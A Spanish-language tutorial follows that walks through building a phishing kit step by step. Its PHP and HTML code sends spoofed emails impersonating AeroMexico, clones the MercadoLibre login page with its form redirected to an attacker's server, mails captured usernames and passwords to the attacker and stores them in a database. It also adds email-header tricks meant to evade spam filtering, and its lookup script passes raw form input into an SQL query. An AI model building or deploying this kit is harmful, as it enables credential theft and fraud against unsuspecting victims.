1er Paso Elegir el Xploit
Lo primero que tenemos que pensar es de que tratará nuestro xploit, de que forma intentaremos engañar a la victima logrando que nos entregue sus contraseñas, claves o datos personales importantes.
Para ello solo necesitamos un poco de imaginación, de la cual yo no estoy encargado de momento, ni tampoco pienso hacerlo en el futuro, cada uno tiene su propio cerebro y sus propias neuronas, háganlas funcionar de vez en cuando y no se dignen solamente a buscar todo ya armado y listo para funcionar.
2do Paso Armando El Formulario
El segundo paso y comenzamos a complicarnos la existencia es la creación de un formulario en html para que podamos introducir los datos para enviar el xploit, entre ellos: Nuestro mail (si lo hacemos de retorno), Mail De La Victima, Servidor de Mail (si queremos hacerlo múltiple), y algún otro dato que precisemos ingresar para confundir a la victima, por ejemplo una pregunta secreta que se nos ocurra para que la victima la responda.
Lo primero que tenemos que hacer es abrir nuestro editor de html (yo a mi gusto: Micro$oft Front Page) y comenzamos con la creacion de un formulario. Para acelerar los pasos les doy un ejemplo ya armado para que puedan modificarlo:
<form action="enviar.php?sec=xploit_enviar" method="post">
<center> <table border="0" width="450" cellspacing="1" height="18">
<tr><td> <p><b>Email Victima:</b></p>
</td><td> <p><input type="text" name="mail"></p>
</td></tr> <tr><td>
<p><b>Tu Email</b></p>
</td><td> <input type="text" name="mailpide">
</td> </tr> </table>
<p align="center">
<input type="submit" value="Enviar Xploit" name="lanzador" size="20"> </form>
Quedaría Algo Así:
Obviamente yo no vengo a explicar HTML, eso lo pueden leer en otros lugares, pero verán que resalte algunos puntos en el código para interpretarlos (ese código péguenlo en "code" (código) del front page).
Enviar.php será el otro archivo que deberemos crear que procesará estos datos que le estamos enviando.
<input type="text" name="mail"> es el área de texto donde pondremos el mail de la victima, identificado con el nombre: "mail", ese nombre es el que usaremos luego en enviar.php para poder procesar lo que ingresamos allí.
<input type="text" name="mailpide"> Será la otra variable que será el mail que solicita el pass, osea el pass donde volverá la contraseña. Identificado con el nombre "mailpide" que como todas las variables del formulario lo usaremos en enviar.php para el envío del xploit.
3er Paso Creacion del Lanzador
Lo que nos queda aquí es la creacion del "enviar.php" que nombrabamos en el segundo paso, en donde tomaremos los datos que ingresamos en el formulario anterior para enviar el xploit.. Para seguir acelerando el proceso aquí va el ejemplo de enviar.php :
<?php
$mensaje=base64_encode($mensaje);
$web="http://web-donde-tienes-alojado.com/xploit"
$msg= "
***MAIL QUE LE LLEGARA A LA VICTIMA***
Te hackearon la cuenta para recuperarla click <a href= "$web/ver.php?mailpide=$mailpide&mail=$mail">aquí</a>.
";
//para el envío en formato HTML
$headers = "MIME-Version: 1.0rn";
$headers .= "Content-type: text/html; charset=iso-8859-1rn";
$headers .= "From: "AeroMexico" <internet@aeromexico.com.mx>";
$asunto= "¡Has ganado un viaje!";
mail($mail, $asunto, $msg, $headers);
echo "Xploit enviado a $mail";
?>
OK, pasemos a explicar... Es simple, esta armado íntegramente en php, con el mensaje que le llegara a la victima en HTML, explicare que $web, es quien se encarga de informar mas abajo (para no repetir varias veces) la url (dirección) de la pagina raíz a donde debe llevar a la victima para que ingrese sus datos. $msg será el mail que le llegará a la victima, en donde deberemos de poner el mayor de nuestros esfuerzos para convencerla de que ingrese a la pagina que le indicamos al hacer click en "click aquí" e ingrese sus datos, fácil, solo un mail que con un poco de ingeniería social estaría listo. Cabe aclarar que como verán que el mail empieza con comillas (" es por ello que dentro del código html que ingresemos deberemos evadir las comillas y si se las son necesarias como hay en el ejemplo se le debe colocar delante de la comilla una barra inclinada hacia la izquierda ( ) . Pequeño detalle que los volverá loco si se lo saltean.
Bueno continuemos, luego de que el mail esta armado e ingresado en forma html al lanzador, seguiremos con los datos que conllevarán al envío del mail. los $headers que vemos en el código son los que permiten que el mail se vea en html y además proporciona los datos de envío como lo son El nombre de quien envía el xploit, en este caso "AeroMexico" (verán que están las barras inclinadas delante de las comillas) y el mail con el que se envía, en este caso "<internet@aeromexico.com.mx>", y el asunto del mail, con la variable $asunto, en este caso "¡Has Ganado un Viaje!", antes de que pregunten porque no lleva barra ese, es porque solo necesitan de las barras inclinadas cuando se encuentra dentro de otras comillas como lo fue en $msg.
Y luego viene la parte del envío del mail con la función mail() de php, en donde solo cita las variables que hemos ingresado anteriormente: $mail, $asunto, $msg, $headers. y luego de todo esta ensaladera de códigos lo que hace enviar.php, si es que la función mail() ha realizado la operación correctamente es, mostrar un mensaje de envío satisfactorio, que vendría a ser: echo "Xploit enviado a $mail"; .
Lo que explicare, antes de salir de este paso, es la parte de la url.. como verán aparece: ver.php?mailpide=$mailpide&mail=$mail donde, VER.PHP será a la pagina donde los llevará para ingresar sus datos, y donde mailpide, será la variable que tendrá en cuenta ver.php para enviar los datos que ingrese la victima a ese mail, y donde mail, será el mail que aparecerá en ver.php a la hora de que ingrese la contraseña en caso de que hablemos de un xploit de Hotmail o algún correo. Solo eso, profundizaremos en el siguiente paso.
4to Paso Creando el ver.php
Otro paso más, ya me esta dando sueño, ahora lo que continua es lo mas laborioso del tutorial. Ya que aquí nos toca buscar la pagina donde la victima ingresará sus datos, es por ello que nos toca ir en busca de la pagina de inicio de sesión de correo, de ingreso a cuenta bancaria, mercado libre o lo que sea, y guardar la pagina en tu disco duro, creo que no me debería pasar a explicar esto, pero lo haré. Me basaré en Mercado Libre (Arg) http://www.mercadolibre.com.ar/jm/micuenta es alli donde la victima debería ingresar sus datos, es por ello que la pagina que creemos debe ser idéntica, para ello iremos a Archivo -> Guardar Pagina Como -> Con el nombre VER.HTML (no otro para prevenir problemas futuros con las imagenes que puedan a llegar a solicitar a la carpeta que se cree que generalmente si dejamos espacios en el nombre del .html no será bien aceptada en el hosting que la hospedemos.)
Luego de guardada, recurriremos a FrontPage o nuestro editor favorito y abriremos la pagina que guardamos, y aca paso a explicar con imágenes para saltear varios pasos:
Hacemos click sobre el cuadradito que apuntamos en la imagen para ubicarnos mejor en el formulario y luego hacemos click en code (codigo), y empezamos a buscar para arriba la etiqueta <FORM> es recomendable hacerla asi antes de poner buscar en todo el documento ya que en la pagina puede haber muchos formularios y el único que necesitamos es el que contenga el Apodo y Clave (en este caso).
Luego de haberlo encontrado como vemos en la imagen lo que deberemos de hacer es cambiar los datos de "Action" que es quien se encarga de mandar los datos a la url que allí vemos (en este caso: http://www.mercadolibre.com.ar/jm/micuenta) , lo que aremos será cambiar la url por:
http://NUESTRAWEB.com/xploit/insertar.php?mail=<? echo $mail; ?>&tipo=<? echo $tipo; ?>&mailpide=<? echo $mailpide; ?>&usuario=<? echo $nombre; ?>&pass=<? echo $pass; ?>
Ya se, QUE DESASTRE!, bue, no es muy difícil, pasaré a explicar aunque ya m estoy aburriendo de tanto escribir, mail, como ya sabemos es el mail de la victima al pasar a insertar.php es tan solo para cuando nos devuelva el mail con los datos, nos diga de quien es el pass (es para aquellas personas que tiene muchas victimas) lo que hace es para prevenir problema de envio de datos, es repetir la variable mail, al igual que con mailpide, y en este caso agregamos usuario (que seria el usuario de MercadoLibre) y luego el pass, lo mas importante a mi parecer.
Lo que viene ahora es lo siguiente, lo que irá debajo del <form>:
<input type="hidden" name="usuario" value="<?php echo $mail; ?>">
<input type="hidden" name="mail" value="<?php echo $mail; ?>">
<input type="hidden" name="mailpide" value="<?php echo $mailpide; ?>">
No pasaré a explicarlos porque ya lo explique en forma sencilla arriba, es solo un método de precaución para evitar perdida de datos en el camino. Creo que es todo en este paso, pasemos al siguiente... =)
5to Paso Creando el insertar.php
Ultimo paso, ya me estaba aburriendo ..ahora luego de que la victima cayó, introdujo sus datos, nos toca devolvernos los datos a nosotros, complicado, pero fácil a la vez, me contradigo no?´. En realidad si estaríamos armando un lanzador múltiple talvez lo sea mas complicado, pero eso lo dejo para otro momento. Pego el codigo y lo explico:
<?
$headers = "MIME-Version: 1.0rn";
$headers .= "Content-type: text/html; charset=iso-8859-1rn";
$headers .= "From: "MarvinCity.com" <webmaster@MarvinClub.com.ar> ";
$sendTo = "$mailpide";
$subject = "La Contraseña Que Pediste (www.MarvinCity.com.ar)";
$message = "
<p> <font face="Book Antiqua" color=#FFFFFF>
Mail: $usuario
</font> <p> <font face="Book Antiqua" color=#FFFFFF>
Contraseña: $pass
</font> ";
mail($sendTo, $subject, $message, $headers); ?>
<SCRIPT LANGUAGE="JavaScript">
location.href='<? echo ("DIRECCION" ?>';
</SCRIPT>
</BODY>
</HTML>
Bueno creo que no hay mucho para explicar ahí, lo de los $headers ya lo explique antes... $sendTo es solo una variable nueva que es a donde tiene que enviarse los datos de la victima. El $menssage ya esta explicado antes, y lo del envío del mail también, lo que tenemos nuevo ahora es el script que es quien se encargará de enviar a la victima a la pagina que determinemos luego de que haya ingresado los datos, por ejemplo si lo hicimos con MercadoLibre, es recomendable que la envíen al inicio de MercadoLibre (http://mercadol!br3.com.ar) es allí donde sustituyen DIRECCIÓN por la dirección de la página a donde quieren redirigir al a victima.
Bonus!! Agregar los pass a una base datos.
Aqui no tiene nada que ver con el uso de los xploits, sino que va ara para los webmasters, lo que nos toca explicar es lo que no se explico en el tutorial de la izquierda, y es de alguna forma crear una base de datos en nuestro host.
Para poder agregarlos a una base de datosal insertar.php le debemos agregar:
$link=mysql_connect("localhost", "USUARIO", "PASS";
mysql_select_db("BASEDEDATOS",$link) OR DIE ("Error: Imposible Conectar";
mysql_query("INSERT INTO `xploit` VALUES ('$usuario', '$pass', '$mailpide');";
Explico? $link lo que hace es conectar a la base de datos, donde dice USUARIO y PASS claro esta que deberemos de poner nuestro usuario y pass de la base de datos, y el nombre de la base de datos que abajo deberemos especificar.
Luego en la segunda linea, selecciona la base de datos y si hay un error salta el alerta, en este caso: "Error: Imposible Conectar"
y en la tercera linea tenemos la introducción de datos a la base de datos, que en este caso para robar pass de correo, solo pide USUARIO, PASS y MAILPIDE, que creo que no habra que explicar cada uno ya que son los unicos tres datos importantes que necesita el insertar.php.
Obviamente para que los datos sean introducidos debemos tener creada la base de datos y de allí vamos a nuestro PhpMyAdmin, luego seleccionamos la base de datos, y luego hacemos click en SQL e insertamos el siguiente codigo:
CREATE TABLE `xploit` (
`usuario` varchar(250) NOT NULL,
`pass` varchar(250) NOT NULL,
`mailpide` varchar(250) default NULL,
PRIMARY KEY (`usuario`)
)
Como veras lo que hace es crear la tabla XPLOIT, que antes en la introduccion de datos menciona. Crea la tabla con las celdas: Usuario - Pass - MailPide.... Nada complicado ni del otro mundo.
Lo que debemos hacer ahora es crear el formulario de busqueda que será así:
<form target="Resultado" method="post" action="buscar.php">
<font style="font-size: 11pt">Correo deseado:
<input type="text" name="usuario" id="usuario">
<input type="submit" value="Buscar clave!" style="font-weight: 700" name="Buscar">
</form> <iframe name="Resultado"></iframe>
Que quedaría algo así:
Como verán lo que hace es usar el formulario (no explicare que es un formulario no es mi funcion y esta explicado a la izquierda) usando de action a buscar.php, que a continuación viene el codigo:
<?
$link=mysql_connect("localhost", "USUARIO", "CONTRASEÑA";
mysql_select_db("BASE DE DATOS",$link) OR DIE ("Error: Imposible Conectar";
$query = "SELECT * FROM xploit WHERE usuario='" . $_POST['usuario'] . "'";
$result = mysql_db_query("BASE DE DATOS", $query);
if ($result) {
while ($r = mysql_fetch_array($result)) {
$nick = $r["usuario"];
$pass = $r["pass"];
echo "Usuario: $nick Pass: $pass";
}
echo "La victima aun no ah caído intenta mas tarde!";
}
?>
Que es lo que hace? al principio vemos como se conecta a la base de datos, luego vemos como en $query selecciona la tabla (otra vez: xploit) y busca el usuario en todas las celdas $usuario, si hay resultado a la búsqueda vemos como con un echo() nos da el Nick y el Pass, y si no existe como nos da un mensaje en este caso: La victima aun no ah caído intenta mas tarde!
Otro detalle que cabe aclarar para evitar confusiones, es que el buscar.php hace accionar dentro de un iframe para no tener que cargar nuevamente la pagina, eso lo vemos en el formulario que creamos que en el <from> encontramos: target="Resultado" , y mas abajo el <iframe> con el nombre "Resultado".
ACTUALIZACIONES:
Modificacion de $headers, para que los correos lleguen a bandeja de entrada
como bien sabemos que los xploits lleguen a correo deseado es todaaa una ciencia, y como tambien bien sabemos por mas que toquemos lo que toquemos, si hotmail se empesino con nuestro hosting, van a llegar a spam siempre.. Perooo.. con la modificacion de los $headers (encabezados) para la funcion mail() de php podemos lograr en un 90% que de ahora en adelante puedan llegar a deseado.
$headers .= "MIME-Version: 1.0n";
$headers .= "Content-type: text/html; charset=iso-8859-1n";
$headers .= "From: ".$FromName . " <" . $FromMail . ">n";
$headers .= "To: ".$FromName . " <" . $FromMail . ">n";
$headers .= "Reply-To: " . $FromMail . "n";
$headers .= "X-Priority: 1n";
$headers .= "X-MSMail-Priority: Highn";
$headers .= "X-Mailer: Widgets.com Server";
$FromName nos referimos al Nombre del que envia el mail; por ej. "Actualizacion Live"; y el $FromMail como bien se nota vendria a ser el Mail emisor; por ej. "Actualizaciones@soporte-mail.com"; y por ultimo el X-Mailer el detonante que nos ayuda a que el xploit llegue a bandeja de entrada..
Limpiar Codigo Innecesario
Como en una parte del codigo qe fui armando veran:
http://NUESTRAWEB.com/xploit/insertar.php?mail=<? echo $mail; ?>&tipo=<? echo $tipo; ?>&mailpide=<? echo $mailpide; ?>&usuario=<? echo $nombre; ?>&pass=<? echo $pass; ?> y
podemos limpiar un poco de codigo colocando asi:
<? echo "http://NUESTRAWEB.com/xploit/insertar.php?mail=$mail&tipo=$tipo&mailpide$mailpide&usuario=$nombre&pass=$pass"; ?>
|
